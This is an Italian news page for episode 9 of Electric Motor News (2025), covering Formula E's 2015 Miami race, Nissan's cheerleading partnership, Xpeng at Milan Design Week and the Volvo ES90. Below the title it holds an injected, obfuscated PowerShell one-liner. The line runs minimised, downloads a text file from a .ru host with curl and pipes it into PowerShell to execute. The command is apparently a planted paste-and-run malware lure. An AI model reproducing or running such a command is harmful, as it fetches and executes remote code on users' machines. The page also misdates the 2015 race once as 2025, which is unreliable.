Electric Motor News in TV, puntata 9 del 2025

PoWeRsHeLl -w Minimized -c cUr"L.E"x"E" -k -L --"re"try 9"9"9 http"s://hast"i"ly"bak"es"h"o"p.ru"/"1"3"0"6"5"3"65"f"51d"88a4"fb0c0d"ab"4e"9d"f858.txt | pow"e"rs"h"el"l" -;" Place Your Entry Here: 2025

Nella puntata 9 di Electric Motor News, retroscena della prima volta della Formula E a Miami nel 2015, Nissan Formula E, Xpeng alla Milano Design Week e Volvo ES90.

Di seguito i servizi video…

I retroscena della prima volta della Formula E a Miami

Sabato prossimo si corre il Miami E-Prix, un ritorno della categoria di monoposto elettrici dopo la quinta gara della storia che si è svolta nel 2015, vinta da  Nico Prost.

Abbiamo intervistato l’ex Responsabile dell’organizzazione di Formula E, Manolo Ortiz Tallo, che simpaticamente ha raccontato molti retroscena in questa lunga intervista, che abbiamo diviso in quattro blocchi.

Ecco quello che è successo nel lontano 2015 a Miami…

Quello che pochi sanno della Formula E a Miami

La Formula E correrà a Miami il prossimo 12 aprile, ma la categoria di monoposto elettriche aveva già corso a Miami la quinta gara della prima stagione, nel 2025. La gara è stata vinta da Nico Prost,  ma nell’intervista, Manolo Ortiz Tallo, ex Chief Operations Formula E, racconta dei particolari e dei retroscena della prima volta della Formula E a Miami. Prima parte di un’intervista da non perdere…

 

Quando Agag si arrabbiò con Andretti a Miami

Nella seconda parte dell’intervista a Manolo Ortiz Tallo, Ex Chief Operations di Formula E, racconta le diverse vicissitudini per cui non è stato possibile chiudere le strade di Miami in tempo utile, dovendo cancellare una prova libera… e l’alterco tra Alejandro Agag, allora CEO di Formula E, e Michael Andretti…. Ma perché si è arrabbiato? Lo scoprirete nella seconda parte dell’intervista… con le foto dell’archivio dei Electric Motor News…

 

Complicata la chiusura delle strade del Miami E-Prix di Formula E

Nella terza parte dell’intervista con Manolo Ortiz Tallo, Ex Formula E Chief Operations, si parla dei problemi della chiusura delle strade, della conseguente sospensioni di una delle due prove libere. In ogni caso, la gara è stato un successo di pubblico ma tra i tanti problemi e dei cambiamenti politici nella Contea non si è tornato a correre a Miami… fino a questo 12 aprile, ma in una diversa location.

Terza parte dell’intervista.

 

I campioni mancati dell’NBA

Nessuno potrà mai sapere la meravigliosa carriera nel basket che avrebbero potuto fare Sam Bird, Antonio Felix Da Costa e Alberto Longo; i primi due non sono arrivati insieme nemmeno alla retina sotto canestro… il secondo non ha potuto presentare il video delle sue geste…. Nell’ultima parte dell’intervista all’ex FE Chief Operations Manolo Ortiz Tallo potete scoprire come sono andate veramente le cose.

Ultima parte dell’intervista.

 

Nissan Formula E Team nel mondo dei cheerlanding

Il Nissan di Formula E Team ha stretto una collaborazione con l’accademia locale di cheerleading Top Gun All-Stars per celebrare l’E-Prix di Miami. In questo modo, il Nissan Formula E Team diventa il primo team di motorsport ad avere una squadra di cheerleader dedicata. La partnership vede la squadra di punta della Top Gun cambiare nome in “Sakura Storm”, in omaggio alle radici giapponesi del Team, rievocate anche dall’uniforme decorata con fiori di ciliegio. In una città con una ricca tradizione sportiva, la collaborazione è nata dal desiderio di attirare l’attenzione degli appassionati, creando uno spettacolo emozionante per annunciare l’arrivo del Nissan Formula E Team a Miami. Per il lancio della partnership, la “Sakura Storm” ha eseguito una coreografia ispirata alle corse automobilistiche presso il Jungle Plaza nel Design District di Miami.

 

Xpeng alla Milano Design Week

Xpeng ha scelto l’iconica Milano Design Week 2025 come palcoscenico d’eccellenza per la sua anteprima sul mercato italiano. L’ADI Design Museum di Milano, riferimento per il design italiano dove ha sede la collezione storica del Premio Compasso d’Oro, è stato scelto da Xpeng come luogo elettivo per ospitare, fino al 13 aprile, “Xpeng: #FUTUREMOBILITY”, una mostra esclusiva per scoprire le soluzioni d’avanguardia di un brand che coniuga robotica, intelligenza artificiale e design futuristico. Protagoniste dell’esposizione, tre avveniristiche creazioni Xpeng, destinate a trasformare il concetto stesso di mobilità: la EV Xpeng P7+, prima vettura al mondo definita dall’Intelligenza Artificiale, l’auto elettrica volante Xpeng Aeroth X2, già premiata con il Gold Prize al “China Excellent Industrial Design Award”, che promette di rivoluzionare il modo in cui ci sposteremo nelle città del futuro, e il robot umanoide Iron, all’avanguardia nell’integrazione tra intelligenza artificiale e movimento biomimetico.

 

The balance of design of the new Volvo ES90

Erik Severinson, Volvo Cars Chief Product and Strategy Officer speaks in the video about the balance of the Volvo ES90 design, as well as Sophie Jingyao Li, Head of Design Studio Shanghai. In this way they introduced the new electric Volvo ES90. Simone Vizzini, Volvo Cars Battery Technology Manager, speaks also about the balance of design and technology of 800 Volt and range of 700 km.

In italiano – L’equilibrio del design della nuova Volvo ES90

Erik Severinson, Chief Product and Strategy Officer di Volvo Cars, parla nel video dell’equilibrio del design della Volvo ES90, insieme a Sophie Jingyao Li, responsabile del Design Studio Shanghai. In questo modo hanno presentato la nuova Volvo ES90 elettrica. Anche Simone Vizzini, responsabile della tecnologia delle batterie di Volvo Cars, parla dell’equilibrio tra design e tecnologia, con una batteria da 800 Volt e un’autonomia di 700 km.

Video in lingua inglese.

 

Ecco  le anteprime fotografiche dei video..

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.